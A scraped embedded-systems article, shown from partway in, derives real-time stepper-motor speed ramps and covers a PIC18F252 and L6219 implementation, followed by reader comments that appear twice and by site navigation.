180/π = 57.3deg. 1rad/sec = 30/π = 9.55rpm.Acceleration ω' (rad/sec2) from adjacent timer counts c1 and c2:\n Equation 3Equation 3 assumes fixed-count speed (Equation 2) at the midpoint of each stepinterval (Equation 1), as on a linear ramp, Figure 1. Note that ω' resolution isinversely proportional to the cube of the speed.\nFigure 1: Figure 1: Ramp geometry: move of Ramp geometry: move of m=12 steps=12 stepsLinear speed ramp—exactLinear speed ramp—exactOn a linear ramp, acceleration ω' is constant, and speed ω(t) = ω'.t. Integration givesthe motor shaft angle θ(t):\n Equation 4n ≥ 0 step number (real). When the shaft is at θ = n.α, (integer n) it's time for thenth step pulse:\n Equation 5The exact timer count to program the delay between the nth and (n+1)th pulses (n≥ 0) is: \n (/videos)video library (/videos)Generate stepper-motor speedprofiles in real time(/design/mcus-processors-and-socs/4006438/Generate-stepper-motor-speed-profiles-in-real-time)10.31.2013Altera’s Stratix 10 makes Cortex-A53 an extreme performanceplayer (/electronics-news/4423607/Altera-s-Stratix-10-makes-Cortex-A53-an-extreme-performance-player)\nMOST COMMENTEDEMBEDDED (/VIDEOS)TV (/VIDEOS)\n Equation 6The initial count c0 factorizes out to give Equations 7 and 8:\n Equation 7\n Equation 8Note that c0 sets the acceleration, proportional to (1/c0)2 .In real-time, Equation 8 would require calculation of a square-root for each step,with the added problem of loss of precision by subtraction.Approximating linear rampApproximating linear rampRatio of successive exact timer counts from Equation 8:\n Equation 9Taylor series:\n Equation 10Equation 11 is the second-order approximation to Equation 9 using Equation 10:\n Equation 11Equation 11 can be rearranged for faster calculation:\n Equation 12Finally, we can disconnect the physical step number, i, from the step number n on aramp from zero, to give the general-purpose ramp algorithm shown in Equation 13.Here n determines the acceleration and increments with i for constant acceleration.To ramp up from stop, ni = i, i=1,2, . . . :\n Equation 13Negative n-values give deceleration. In particular, Equation 14, with ni = i - m, canbe used to ramp any speed down to stop in the final steps of a move of m steps:Datasheets.com(http://www.datasheets.com)Currently no itemsRELATED CONTENT12.30.2004 | DESIGNGenerate stepper-motor speedprofiles in real time(/design/mcus-processors-and-socs/4006438/Generate-stepper-motor-speed-profiles-in-real-time)11.01.2010 | SOURCE CODEMotor.c(/design/embedded/source-code/4210291/Motor-c)03.18.2005 | DESIGNTricks with PICs(/design/prototyping-and-development/4006445/Tricks-with-PICs)08.07.2007 | NEWSMicrochip launchessemiconductor Wiki (/electronics-news/4135755/Microchip-launches-semiconductor-Wiki)04.01.2009 | DESIGNLinear motor control without themath (/design/prototyping-and-development/4008259/Linear-motor-control-without-the-math)PARTS SEARCH\n185 MILLION SEARCHABLE PARTSKNOWLEDGE CENTERpowered by DataSheets.com Equation 14Table 1: Table 1: Accuracy of the step-delay approximationAccuracy of the step-delay approximationStep nExact (9)Approx (11)Relative error10.41420.60000.448520.76730.77780.013630.84300.84620.0037040.88100.88240.0015250.90410.90487.66E-460.91960.92004.41E-4100.95110.95129.42E-51000.99500.99509.38E-81,0000.99950.99959.37E-11Accuracy of approximationAccuracy of approximationTable 1 shows that the approximation is accurate even at low step number n andrelative error decreases with n3. However, n=1 has a significant inaccuracy. Theinaccuracy at n=1 can be handled in two ways:Treat n=1 as a special case. Using c1 0.4056 c0 compensates for theinaccuracies at the start of the ramp and allows Equation 7 to be used tocalculate c0.Ignore the inaccuracy. In place of Equation 7 use Equation 15:\n Equation 15The first alternative gives an almost perfect linear ramp. The second alternativestarts with a fast step. This is to the good, as it helps keep the motor movingbetween step pulses 0 and 1-and establishes the angle error needed to generatetorque. It also allows a wider range of accelerations to be generated with a 16-bittimer and has the advantage of simplicity. It's therefore recommended to ignore theinaccuracy at n=1.\nFigure 2: Stepper-motor speed rampFigure 2: Stepper-motor speed rampFigure 3: Start of ramp detailFigure 3: Start of ramp detail\nFigure 4: End of ramp detailFigure 4: End of ramp detailFigures 2 through 4 compare the options for a target ramp from 0 to 120rpm in1sec. For clarity, step changes in speed are shown, calculated from Equation 2. Thetrue profile should be close to a straight line.2.c/(4.n+1) in Equation 12 could be approximated by c/2.n. Some effects would be:The algorithm would still produce a linear ramp.c0 would be closer to the \"exact\" value shown in Equation 7: 88.6%instead of 67.6% for the same ramp acceleration.A single equation like Equation 13 could no longer be used for bothacceleration and deceleration.Changes of accelerationFrom Equations 4 and 5 we can obtain an expression for the step number n as afunction of speed and acceleration:\n Equation 16Thus the number of steps needed to reach a given speed is inversely proportional tothe acceleration:\n Equation 17This makes it possible to change the acceleration at a point on the ramp by changingthe step number n in the ramp algorithm Equation 13. Moreover, using signed ω'values results in signed n-values that behave correctly in the algorithm. Only ω' = 0needs special handling.The n-value given by Equation 17 is correct for tn. However cn represents an averagefor the interval tn .. tn+1. Equation 17 is usually adequate, but it's more accurate toadd a half-step to n-values for use in the ramp algorithm:\n Equation 18The numerical example shown in Table 2 changes acceleration from 10 to 5 and to-20rad/sec2 from step 200. Complex speed profiles can be built up piecewise in thisway.Table 2: Table 2: Acceleration changesAcceleration changesStepinici (13)ω'(3)notes1981982,813.067 \n199199398.5-100.252,806.0081010.(199+.5) =5.(398.5+.5) =-20.(-100.25+.5)200399.52,803.4985\n201400.52,799.0015200-99.252,820.180-20\n201-98.252,834.568-20Deceleration rampDeceleration rampFor a short move of m steps, where the up-ramp at ω'1 meets the down-ramp at ω'2before max speed is reached, the step number m at which to start decelerating is,from Equation 17:\n Equation 19ω'1 = acceleration, ω'2 = deceleration (positive). Round n to integer and calculate cn.. cm-1 using Equation 14.In other cases, Equations 17 or 18 can be used to calculate the number of steps n2needed to stop at deceleration ω'2, given that the present speed was reached at stepn1 with acceleration ω'1. Round n2 to integer and calculate cm-n2 .. cm-1 using Equation14.Smooth shift to max speedSmooth shift to max speedThe ideal speed profile would make a smooth transition from ramp acceleration ω' tomax speed ωmax. Higher speed is possible by reducing the acceleration near the topof the ramp, and you can avoid possible undesirable effects of a discontinuity inacceleration.There are several ways to achieve a smooth transition while still allowing real-timecomputation on a low-end processor:Reduce ω' in stages, giving a piecewise linear transition.Add a power term to the denominator of the ramp algorithm.Scale the change from ci-1 to ci by a linear factor.Now let's compare these methods.Piecewise linearPiecewise linearThis method, shown in Figure 5, is very flexible. Any number of breaks can be used.A set of ω-values is chosen at which ω' is successively reduced. The ramp algorithmin Equation 13 is used. At each step, n is incremented, and if ω (or c) crosses abreak value, n is recalculated.Figure 5: PiecewiseFigure 5: PiecewiseFigure 5 results from the jth break given by (c)j=0 = 3.cmin, (c)j = ((c)j- 1+cmin)/2,(ni)j = 1.375.(ni- 1+1), j = 1,2,..,7. (c)j = delay count at jth break, cmin, = delaycount at ωmax.Power termPower termEquation 20 adds a power term to the denominator of the ramp algorithm (Equation12):\n Equation 20At low speed (low step-number n), the power term k·np is negligible, so accelerationis constant. As speed rises, k·np starts to dominate, eventually reducing theacceleration to zero. A higher power p produces a sharper \"knee.\" The approach toωmax is asymptotic.The transition occurs around k·np = 4.n. This can be used to calculate anapproximate value for the constant k from initial acceleration ω' and required maxspeed ωmax:\n Equation 21The graphs in Figure 6 use Equation 21 to calculate k for p=2,3,4,5. The curve fallsshort of ωmax for p=2 but k is good for higher powers.\nFigure 6: Power term, Figure 6: Power term, p=2,3,4,5=2,3,4,5Linear factorLinear factorIn this method we run the ramp algorithm (Equation 12) up to step n1 and thenscale the changes in c by a factor that reduces from 1 at step n1 to 0 at step n2:\n Equation 22\nFigure 7: Linear factorFigure 7: Linear factorThe acceleration curve is fairly linear and symmetrical over the transition. ωmax isreached in about twice the time taken with no transition, as shown in Figure 7. ωmaxcan be estimated by integrating a continuous version of Equation 22,\n. We obtain:\n Equation 23Equation 23 is accurate for a wide range of parameters, including n1=0. It thensimplifies to Equation 24 (compare with Equation 16):\n Equation 24In Figure 7, the linear factor method is applied with transition ranges starting at 0and 30%, 50%, and 70% of ωmax.A linear-factor transition can also be applied to the downramp:\n Equation 25Step-number n3, the start of the transition from max speed to the down-ramp, iscalculated as in the previous example. For a short move, n3=n2, calculated byEquation 19.Figure 8: Linear factor: dual transitionsFigure 8: Linear factor: dual transitionsFigure 8 shows examples with and without a section at ωmax: m=700, ω'1 =10, ω'2= -20, n1=0, n2=432, n3=484; and m=500, n2=n3=333, other parametersunchanged.Transition methods in sumTransition methods in sumThe form of the transition curve is assumed to be less important than ease ofcalculation and control of parameters, particularly ωmax and the size of the transitionregion.The piecewise-linear method is flexible and can be arranged to require no morecalculation than a simple ramp, and give a visually smooth speed profile. It may notwork with some sets of parameters, though.In the power-term method, the k-parameter is easily calculated from ωmax.Calculating the power term creates problems in fixed-point arithmetic, as valuesvary over a wide range.The linear-factor method is recommended as reliable and easy to calculate in fixed-point arithmetic. Because ωmax is reached at a known step number, the method isgood for short moves and can transition from acceleration to deceleration with nodiscontinuity, as Figure 8 demonstrates. Starting the transition at n1=0 gives anarrow transition region, and it's straightforward to calculate n2 from ωmax.The methods are compared in Figures 5 through 7.ImplementationImplementationYou can implement this stepper-control algorithm using a PIC18F252 and a L6219.The L6219 stepper driver IC performs the following functions:Provides diode-protected H-bridge drives capable of 46V/750mA to thetwo motor windingsTranslates digital signals from the PIC to current direction in the motorwindings (PHASE1, 2 inputs)Limits each winding current to 0, 33%, 67%, or 100% of a preset value bychopping the drive to the H-bridge transistors (inputs I01, I11, I02, I12)The maximum current is set by a current-sense resistor for each winding.The L6219 doesn't have \"step\" and \"direction\" control lines like some stepper controlICs. The winding phase sequence must be provided by the PIC. This makes controlslightly more complicated but gives extra flexibility and reduces cost. It also meansthat the phase can be restored easily on power-up.By using the I-inputs, the L6219 can be used for half- and quarter-step operation.For full-step, they can be tied together and driven by one GPIO from the PIC.Microchip's PIC18F252 is a 28-pin device with the same footprint as the PIC16F876.The more powerful core of the '252 makes it easier to program in C. Figure 9 showshow the internal timing resources were configured for controlling the L6219.Figure 9: PIC18F252 timer configuration for L6219 interfaceFigure 9: PIC18F252 timer configuration for L6219 interfaceAn 8MHz crystal and the PIC's ×4 PLL frequency multiplier are used to generate a32MHz processor clock. This is divided by four to clock the timers at 8MHz. Drivingthe motor involves the following sequence:1. Get parameters: step count, direction, delay count c0, max speed and soforth.2. Set up hardware: initialise CCP1 and CCP2, enable motor current, enableCCP1 interrupts.3. Service CCP1 interrupts: count the steps and execute a state machine toreconfigure the CCPs and calculate the next timer value.4. Clean up: after the last step, disable CCP1 interrupts, current off, flag themove done.The listing (online at http://www.eetimes.com/design/embedded/source-code/4210291/Motor-c (http://www.eetimes.com/design/embedded/source-code/4210291/Motor-c)) is a minimal demo of these steps, with linear ramps, fixedmaximum speed and accelerations. The author used the CCS compiler. Minorchanges will be required for other compilers.Stepping outStepping outThe real-time algorithms I've explained here significantly reduce the processingpower needed for smooth speed control of stepper motors. The linear rampalgorithm can be adapted to piecewise linear speed profiles and smooth transitionsfrom ramp to max speed.David AustinDavid Austin is a freelance software engineer from Durham, U.K. You can reachhim at dave@slotech.fsnet.co.uk (mailto:dave@slotech.fsnet.co.uk).ResourcesResourcesAcarnley, Paul. Stepping Motors— A Guide to Theory and Practice, 4th edition.London: Institution of Electrical Engineers, 2002.Kenjo, Takashi and Akira Sugawara. Stepping Motors and their MicroprocessorControls, 2nd edition. Oxford University Press, March, 1995.Control of Stepping Motors— A Tutorial www.cs.uiowa.edu/~jones/step/(http://www.cs.uiowa.edu/%7Ejones/step/)4Tweet\n (mailto:?subject=Generate stepper-motor speed profiles in realtime&body=http://www.embedded.com/design/mcus-processors-and-socs/4006438/Generate-stepper-motor-speed-profiles-in-real-time)Suppliers' Web sites:Suppliers' Web sites:PIC18F252 www.microchip.com (http://www.microchip.com)L6219 www.st.com (http://www.st.com)PIC C compiler www.ccsinfo.com (http://www.ccsinfo.com)Stepper motors www.rotalink.com (http://www.rotalink.com)Mathcad (graphs) www.mathsoft.com (http://www.mathsoft.com)Share\n25LikeLike\n14 COMMENTSDeepak_K (/User/Deepak_K) POSTED: JUN 12, 2015 6:52 AM EDTHi, After equation 12, I could not understand the approach. I think I veered awayfrom the point..I failed to understand this part: \"Finally, we can disconnect the physical step number, i, from the step number n on a ramp fromzero, to give the general-purpose ramp algorithm shown in Equation 13. Here n determines theacceleration and increments with i for constant acceleration. To ramp up from stop, ni = i, i=1,2,. . . :\" Can anyone please try to explain what is \"i\" and why did it come in? Also what is the difference between n and i?REPLY (/LOGIN?ASSETID=203&SUCCESSFULLOGINREDIRECT=HTTP%3A%2F%2FWWW.EMBEDDED.COM%2FDESIGN%2FMCUS-PROCESSORS-AND-SOCS%2F4006438%2FGENERATE-STEPPER-MOTOR-SPEED-PROFILES-IN-REAL-TIME)Deepak_K (/User/Deepak_K) POSTED: SEPT 4, 2014 5:09 AM EDTHi, What if we just modulate the frequency of the pulse train to the motor with asine function (0 to 90 degrees)? Wouldn't that give a smooth s shaped curve?REPLY (/LOGIN?ASSETID=203&SUCCESSFULLOGINREDIRECT=HTTP%3A%2F%2FWWW.EMBEDDED.COM%2FDESIGN%2FMCUS-PROCESSORS-AND-SOCS%2F4006438%2FGENERATE-STEPPER-MOTOR-SPEED-PROFILES-IN-REAL-TIME)Jorick23 (/User/Jorick23) POSTED: AUG 14, 2014 3:56 PM EDTMy application has a very simple way of ramping quickly up to speed. Every stepinterrupt, I take the timer count (based on a 120 MHz clock) and shift it right(divide by power of 2) by a set amount and subtract the result from the timercount to get a new timer count for the next step. This results in a somewhatlinear increase in speed. This also works for speed decreases where the shiftedvalue is added to the timer count. For slower ramps of over a second, I have the starting and ending rates in a 64-bit integer,something like billionths of a revolution per second. Prior to the ramp, I figure out how much ofa rate increase or decrease needs to be done every millisecond (the tick count rate). Then Iconvert the rate to a timer count inside the tick interrupt with one divide by a precomputedconstant.REPLY (/LOGIN?ASSETID=203&SUCCESSFULLOGINREDIRECT=HTTP%3A%2F%2FWWW.EMBEDDED.COM%2FDESIGN%2FMCUS-PROCESSORS-AND-SOCS%2F4006438%2FGENERATE-STEPPER-MOTOR-SPEED-PROFILES-IN-REAL-TIME)Jupiik (/User/Jupiik) POSTED: MAY 4, 2011 10:21 PM EDTI tried it the way altronics suggested and I got nonlinear speed profile (blue line in graph) thatsbecause (speed = distance / time) and time is below \"/\" so it has nonlinear function in speed butif you keep whole time in memory reversed value (1/time) and every step add constat value andWRITE A COMMENTTHEN reverse it and set to counter you will get nice linear speed profile (red onein graph) and i didnt have to use any hard Equations. But to be honest this articlewas base for whole my work/study about stepper motor speed profilesgenerating. (btw sorry for slovak in graph but anyway its obvious and I was lazyto translate it..) http://dl.dropbox.com/u/545374/rychlostny%20profil.jpg(http://dl.dropbox.com/u/545374/rychlostny%20profil.jpg)REPLY (/LOGIN?ASSETID=203&SUCCESSFULLOGINREDIRECT=HTTP%3A%2F%2FWWW.EMBEDDED.COM%2FDESIGN%2FMCUS-PROCESSORS-AND-SOCS%2F4006438%2FGENERATE-STEPPER-MOTOR-SPEED-PROFILES-IN-REAL-TIME)Sunil.Singh_#3 (/User/Sunil.Singh_%233) POSTED: JUL 24, 2011 12:43 PMEDTHi Jupiik, I tried to understand your comment but probably don't understand it fully.I would appreciate if you may elaborate \"whole time in memory reversedvalue (1/time) and every step add constat value and THEN reverse it and set to counteryou will get nice linear speed \". Thanks sunilREPLY (/LOGIN?ASSETID=203&SUCCESSFULLOGINREDIRECT=HTTP%3A%2F%2FWWW.EMBEDDED.COM%2FDESIGN%2FMCUS-PROCESSORS-AND-SOCS%2F4006438%2FGENERATE-STEPPER-MOTOR-SPEED-PROFILES-IN-REAL-TIME)Cch1955 (/User/Cch1955) POSTED: MAR 12, 2012 7:41 PM EDTHi Jupiik, i have project where you simplified computation for trapazoidal rampcalulation would be helpful. Is it possible to see you paper or the equationor code involved? Thanks so much. CCHREPLY (/LOGIN?ASSETID=203&SUCCESSFULLOGINREDIRECT=HTTP%3A%2F%2FWWW.EMBEDDED.COM%2FDESIGN%2FMCUS-PROCESSORS-AND-SOCS%2F4006438%2FGENERATE-STEPPER-MOTOR-SPEED-PROFILES-IN-REAL-TIME)Altronics (/User/Altronics) POSTED: MAR 13, 2011 5:37 AM EDTCouldn't that same linear ramp be more easily implemented by simply using asmall set delay time (say 1ms) multiplied by a start delay factor and a decreasingloop between each step? Example: Start delay time =100 //100ms decrement factor = 2 for (x=100; x=0; x=x-2) { move_motor_1_step(); delay(x); } get the idea? REPLY (/LOGIN?ASSETID=203&SUCCESSFULLOGINREDIRECT=HTTP%3A%2F%2FWWW.EMBEDDED.COM%2FDESIGN%2FMCUS-PROCESSORS-AND-SOCS%2F4006438%2FGENERATE-STEPPER-MOTOR-SPEED-PROFILES-IN-REAL-TIME)Triffid Hunter (/User/Triffid%20Hunter) POSTED: APR 10, 2011 10:59 PMEDTI wish it were that easy! acceleration is dv/dt. your algorithm increases dv while decreasing dt,giving an exponential change in velocity rather than linear. Thus, you either cannot attain high speeds because the motor can't supply enoughtorque, or your acceleration from slow speeds or stop is infuriatingly low. There will be asweet spot around the knee of this exponential curve, where you won't notice thedifference much, but if you're ramping significant mass from zero to some high speedyou'll be significantly affected. EMC2 simply has a constant velocity, and updates that velocity from a separate timerevery 10mS or so. It's a simple approach, albeit far less elegant than the one described inthis article.REPLY (/LOGIN?ASSETID=203&SUCCESSFULLOGINREDIRECT=HTTP%3A%2F%2FWWW.EMBEDDED.COM%2FDESIGN%2FMCUS-PROCESSORS-AND-SOCS%2F4006438%2FGENERATE-STEPPER-MOTOR-SPEED-PROFILES-IN-REAL-TIME)Susan.rambo (/User/Susan.rambo) POSTED: NOV 1, 2010 1:40 PM ESTI reposted the Motor.c code in our new source code library. You can find it herehttp://www.eetimes.com/design/embedded/source-code/4210291/Motor-c.(http://www.eetimes.com/design/embedded/source-code/4210291/Motor-c.)(The link in this article is also now up to date.) I'll be updating all the ESD/ESPmagazine source code archive links in the next month to make sure all sourcecode from Embedded Systems Programming/ESD magazine is connected to an article and viceversa. --Susan Rambo Managing editor, ESD magazineREPLY (/LOGIN?ASSETID=203&SUCCESSFULLOGINREDIRECT=HTTP%3A%2F%2FWWW.EMBEDDED.COM%2FDESIGN%2FMCUS-PROCESSORS-AND-SOCS%2F4006438%2FGENERATE-STEPPER-MOTOR-SPEED-PROFILES-IN-REAL-TIME)Jamesyn (/User/Jamesyn) POSTED: JAN 10, 2014 4:13 PM ESThi miss. your link is not working . i can't download.pls give me another link.thak youREPLY (/LOGIN?ASSETID=203&SUCCESSFULLOGINREDIRECT=HTTP%3A%2F%2FWWW.EMBEDDED.COM%2FDESIGN%2FMCUS-PROCESSORS-AND-SOCS%2F4006438%2FGENERATE-STEPPER-MOTOR-SPEED-PROFILES-IN-REAL-TIME)Greatfog (/User/Greatfog) POSTED: NOV 1, 2010 12:39 PM ESTMs. Rambo, Managing Editor of Embedded Systems Design, has fixed the link tothe code. Thank you, ma'm!REPLY (/LOGIN?ASSETID=203&SUCCESSFULLOGINREDIRECT=HTTP%3A%2F%2FWWW.EMBEDDED.COM%2FDESIGN%2FMCUS-PROCESSORS-AND-SOCS%2F4006438%2FGENERATE-STEPPER-MOTOR-SPEED-PROFILES-IN-REAL-TIME)Dandumit (/User/Dandumit) POSTED: NOV 1, 2010 8:58 AM ESTGreat Info. I would like also to access the file motor.c but it seems to rejectanonymous login. Maybe someone can help ?REPLY (/LOGIN?ASSETID=203&SUCCESSFULLOGINREDIRECT=HTTP%3A%2F%2FWWW.EMBEDDED.COM%2FDESIGN%2FMCUS-PROCESSORS-AND-SOCS%2F4006438%2FGENERATE-STEPPER-MOTOR-SPEED-PROFILES-IN-REAL-TIME)Tumnao (/User/Tumnao) POSTED: OCT 11, 2010 9:52 AM EDTGreat article! What are the credentials to download the example file (motor.c)?REPLY (/LOGIN?ASSETID=203&SUCCESSFULLOGINREDIRECT=HTTP%3A%2F%2FWWW.EMBEDDED.COM%2FDESIGN%2FMCUS-PROCESSORS-AND-SOCS%2F4006438%2FGENERATE-STEPPER-MOTOR-SPEED-PROFILES-IN-REAL-TIME)SUNMY (/User/SUNMY) POSTED: OCT 11, 2009 9:49 AM EDTgood job!REPLY (/LOGIN?ASSETID=203&SUCCESSFULLOGINREDIRECT=HTTP%3A%2F%2FWWW.EMBEDDED.COM%2FDESIGN%2FMCUS-PROCESSORS-AND-SOCS%2F4006438%2FGENERATE-STEPPER-MOTOR-SPEED-PROFILES-IN-REAL-TIME)Deepak_K (/User/Deepak_K) POSTED: JUN 12, 2015 6:52 AM EDTHi, After equation 12, I could not understand the approach. I think I veered awayfrom the point..I failed to understand this part: \"Finally, we can disconnect the physical step number, i, from the step number n on a ramp fromzero, to give the general-purpose ramp algorithm shown in Equation 13. Here n determines theacceleration and increments with i for constant acceleration. To ramp up from stop, ni = i, i=1,2,. . . :\" Can anyone please try to explain what is \"i\" and why did it come in? Also what is the difference between n and i?REPLY (/LOGIN?ASSETID=203&SUCCESSFULLOGINREDIRECT=HTTP%3A%2F%2FWWW.EMBEDDED.COM%2FDESIGN%2FMCUS-PROCESSORS-AND-SOCS%2F4006438%2FGENERATE-STEPPER-MOTOR-SPEED-PROFILES-IN-REAL-TIME)Deepak_K (/User/Deepak_K) POSTED: SEPT 4, 2014 5:09 AM EDTHi, What if we just modulate the frequency of the pulse train to the motor with asine function (0 to 90 degrees)? Wouldn't that give a smooth s shaped curve?REPLY (/LOGIN?ASSETID=203&SUCCESSFULLOGINREDIRECT=HTTP%3A%2F%2FWWW.EMBEDDED.COM%2FDESIGN%2FMCUS-PROCESSORS-AND-SOCS%2F4006438%2FGENERATE-STEPPER-MOTOR-SPEED-PROFILES-IN-REAL-TIME)Jorick23 (/User/Jorick23) POSTED: AUG 14, 2014 3:56 PM EDTMy application has a very simple way of ramping quickly up to speed. Every stepinterrupt, I take the timer count (based on a 120 MHz clock) and shift it right(divide by power of 2) by a set amount and subtract the result from the timercount to get a new timer count for the next step. This results in a somewhatlinear increase in speed. This also works for speed decreases where the shiftedvalue is added to the timer count. For slower ramps of over a second, I have the starting and ending rates in a 64-bit integer,something like billionths of a revolution per second. Prior to the ramp, I figure out how much ofa rate increase or decrease needs to be done every millisecond (the tick count rate). Then Iconvert the rate to a timer count inside the tick interrupt with one divide by a precomputedconstant.REPLY (/LOGIN?ASSETID=203&SUCCESSFULLOGINREDIRECT=HTTP%3A%2F%2FWWW.EMBEDDED.COM%2FDESIGN%2FMCUS-PROCESSORS-AND-SOCS%2F4006438%2FGENERATE-STEPPER-MOTOR-SPEED-PROFILES-IN-REAL-TIME)Jupiik (/User/Jupiik) POSTED: MAY 4, 2011 10:21 PM EDTI tried it the way altronics suggested and I got nonlinear speed profile (blue linein graph) thats because (speed = distance / time) and time is below \"/\" so it hasnonlinear function in speed but if you keep whole time in memory reversedvalue (1/time) and every step add constat value and THEN reverse it and set tocounter you will get nice linear speed profile (red one in graph) and i didnt haveto use any hard Equations. But to be honest this article was base for whole my work/studyabout stepper motor speed profiles generating. (btw sorry for slovak in graph but anyway itsobvious and I was lazy to translate it..) http://dl.dropbox.com/u/545374/rychlostny%20profil.jpg(http://dl.dropbox.com/u/545374/rychlostny%20profil.jpg)REPLY (/LOGIN?ASSETID=203&SUCCESSFULLOGINREDIRECT=HTTP%3A%2F%2FWWW.EMBEDDED.COM%2FDESIGN%2FMCUS-PROCESSORS-AND-SOCS%2F4006438%2FGENERATE-STEPPER-MOTOR-SPEED-PROFILES-IN-REAL-TIME)Sunil.Singh_#3 (/User/Sunil.Singh_%233) POSTED: JUL 24, 2011 12:43 PMEDTHi Jupiik, I tried to understand your comment but probably don't understand it fully.I would appreciate if you may elaborate \"whole time in memory reversedvalue (1/time) and every step add constat value and THEN reverse it and set to counteryou will get nice linear speed \". Thanks sunilREPLY (/LOGIN?ASSETID=203&SUCCESSFULLOGINREDIRECT=HTTP%3A%2F%2FWWW.EMBEDDED.COM%2FDESIGN%2FMCUS-PROCESSORS-AND-SOCS%2F4006438%2FGENERATE-STEPPER-MOTOR-SPEED-PROFILES-IN-REAL-TIME)Cch1955 (/User/Cch1955) POSTED: MAR 12, 2012 7:41 PM EDTHi Jupiik, i have project where you simplified computation for trapazoidal rampcalulation would be helpful. Is it possible to see you paper or the equationor code involved? Thanks so much. CCHREPLY (/LOGIN?ASSETID=203&SUCCESSFULLOGINREDIRECT=HTTP%3A%2F%2FWWW.EMBEDDED.COM%2FDESIGN%2FMCUS-PROCESSORS-AND-SOCS%2F4006438%2FGENERATE-STEPPER-MOTOR-SPEED-PROFILES-IN-REAL-TIME)Altronics (/User/Altronics) POSTED: MAR 13, 2011 5:37 AM EDTCouldn't that same linear ramp be more easily implemented by simply using asmall set delay time (say 1ms) multiplied by a start delay factor and a decreasingloop between each step? Example: Start delay time =100 //100ms decrement factor = 2 for (x=100; x=0; x=x-2) { move_motor_1_step(); delay(x); } get the idea? REPLY (/LOGIN?ASSETID=203&SUCCESSFULLOGINREDIRECT=HTTP%3A%2F%2FWWW.EMBEDDED.COM%2FDESIGN%2FMCUS-PROCESSORS-AND-SOCS%2F4006438%2FGENERATE-STEPPER-MOTOR-SPEED-PROFILES-IN-REAL-TIME)Triffid Hunter (/User/Triffid%20Hunter) POSTED: APR 10, 2011 10:59 PMEDTI wish it were that easy! acceleration is dv/dt. your algorithm increases dv while decreasing dt,giving an exponential change in velocity rather than linear. Thus, you either cannot attain high speeds because the motor can't supply enoughtorque, or your acceleration from slow speeds or stop is infuriatingly low. There will be asweet spot around the knee of this exponential curve, where you won't notice thedifference much, but if you're ramping significant mass from zero to some high speedyou'll be significantly affected. EMC2 simply has a constant velocity, and updates that velocity from a separate timerevery 10mS or so. It's a simple approach, albeit far less elegant than the one described inthis article.REPLY (/LOGIN?ASSETID=203&SUCCESSFULLOGINREDIRECT=HTTP%3A%2F%2FWWW.EMBEDDED.COM%2FDESIGN%2FMCUS-PROCESSORS-AND-SOCS%2F4006438%2FGENERATE-STEPPER-MOTOR-SPEED-PROFILES-IN-REAL-TIME)Susan.rambo (/User/Susan.rambo) POSTED: NOV 1, 2010 1:40 PM ESTI reposted the Motor.c code in our new source code library. You can find it herehttp://www.eetimes.com/design/embedded/source-code/4210291/Motor-c.(http://www.eetimes.com/design/embedded/source-code/4210291/Motor-c.)(The link in this article is also now up to date.) I'll be updating all the ESD/ESPmagazine source code archive links in the next month to make sure all sourcecode from Embedded Systems Programming/ESD magazine is connected to an article and viceversa. --Susan Rambo Managing editor, ESD magazineREPLY (/LOGIN?ASSETID=203&SUCCESSFULLOGINREDIRECT=HTTP%3A%2F%2FWWW.EMBEDDED.COM%2FDESIGN%2FMCUS-PROCESSORS-AND-SOCS%2F4006438%2FGENERATE-STEPPER-MOTOR-SPEED-PROFILES-IN-REAL-TIME)Jamesyn (/User/Jamesyn) POSTED: JAN 10, 2014 4:13 PM ESThi miss. your link is not working . i can't download.pls give me another link.thak youREPLY (/LOGIN?ASSETID=203&SUCCESSFULLOGINREDIRECT=HTTP%3A%2F%2FWWW.EMBEDDED.COM%2FDESIGN%2FMCUS-PROCESSORS-AND-SOCS%2F4006438%2FGENERATE-STEPPER-MOTOR-SPEED-PROFILES-IN-REAL-TIME)Greatfog (/User/Greatfog) POSTED: NOV 1, 2010 12:39 PM ESTMs. Rambo, Managing Editor of Embedded Systems Design, has fixed the link tothe code. Thank you, ma'm!REPLY (/LOGIN?ASSETID=203&SUCCESSFULLOGINREDIRECT=HTTP%3A%2F%2FWWW.EMBEDDED.COM%2FDESIGN%2FMCUS-PROCESSORS-AND-SOCS%2F4006438%2FGENERATE-STEPPER-MOTOR-SPEED-PROFILES-IN-REAL-TIME)Dandumit (/User/Dandumit) POSTED: NOV 1, 2010 8:58 AM ESTGreat Info. I would like also to access the file motor.c but it seems to rejectanonymous login. Maybe someone can help ?REPLY (/LOGIN?ASSETID=203&SUCCESSFULLOGINREDIRECT=HTTP%3A%2F%2FWWW.EMBEDDED.COM%2FDESIGN%2FMCUS-PROCESSORS-AND-SOCS%2F4006438%2FGENERATE-STEPPER-MOTOR-SPEED-PROFILES-IN-REAL-TIME)Tumnao (/User/Tumnao) POSTED: OCT 11, 2010 9:52 AM EDTGreat article! What are the credentials to download the example file (motor.c)?REPLY (/LOGIN?ASSETID=203&SUCCESSFULLOGINREDIRECT=HTTP%3A%2F%2FWWW.EMBEDDED.COM%2FDESIGN%2FMCUS-PROCESSORS-AND-SOCS%2F4006438%2FGENERATE-STEPPER-MOTOR-SPEED-PROFILES-IN-REAL-TIME)SUNMY (/User/SUNMY) POSTED: OCT 11, 2009 9:49 AM EDTgood job!REPLY (/LOGIN?ASSETID=203&SUCCESSFULLOGINREDIRECT=HTTP%3A%2F%2FWWW.EMBEDDED.COM%2FDESIGN%2FMCUS-PROCESSORS-AND-SOCS%2F4006438%2FGENERATE-STEPPER-MOTOR-SPEED-PROFILES-IN-REAL-TIME)\nDEVELOPMENTCENTERSAll Articles(/development)Configurable Systems(/development/configurable-systems)Connectivity(/development/connectivity)Debug & Optimization(/development/debug-and-optimization)MCUs, Processors &SoCs(/development/mcus-processors-and-socs)Operating SystemsESSENTIALS &EDUCATIONProducts (/products/all)News (/news/all)Source Code Library(/education-training/source-codes)Webinars (/education-training/webinars)Courses (/education-training/courses)Tech Papers(/education-training/tech-papers)COMMUNITYInsights (/insights)Forums(http://forums.embedded.com)Events (/events)ARCHIVESEmbedded SystemsProgramming /Embedded SystemsDesign Magazine(/magazines)Newsletters(/archive/Embedded-com-Tech-Focus-Newsletter-Archive)Videos (/videos)Collections(/collections/all)ABOUT USAbout Embedded(/aboutus)Contact Us (/contactus)Newsletters(/newsletters)Advertising(/advertising)Editorial Contributions(/editorial-contributions)Site Map (/site-map)Subscribe to RSS updatesSubscribe to RSS updates or all articles (/rss/all)category ▼(/development/operating-systems)Power Optimization(/development/power-optimization)ProgrammingLanguages & Tools(/development/programming-languages-and-tools)Prototyping &Development(/development/prototyping-and-development)Real-time 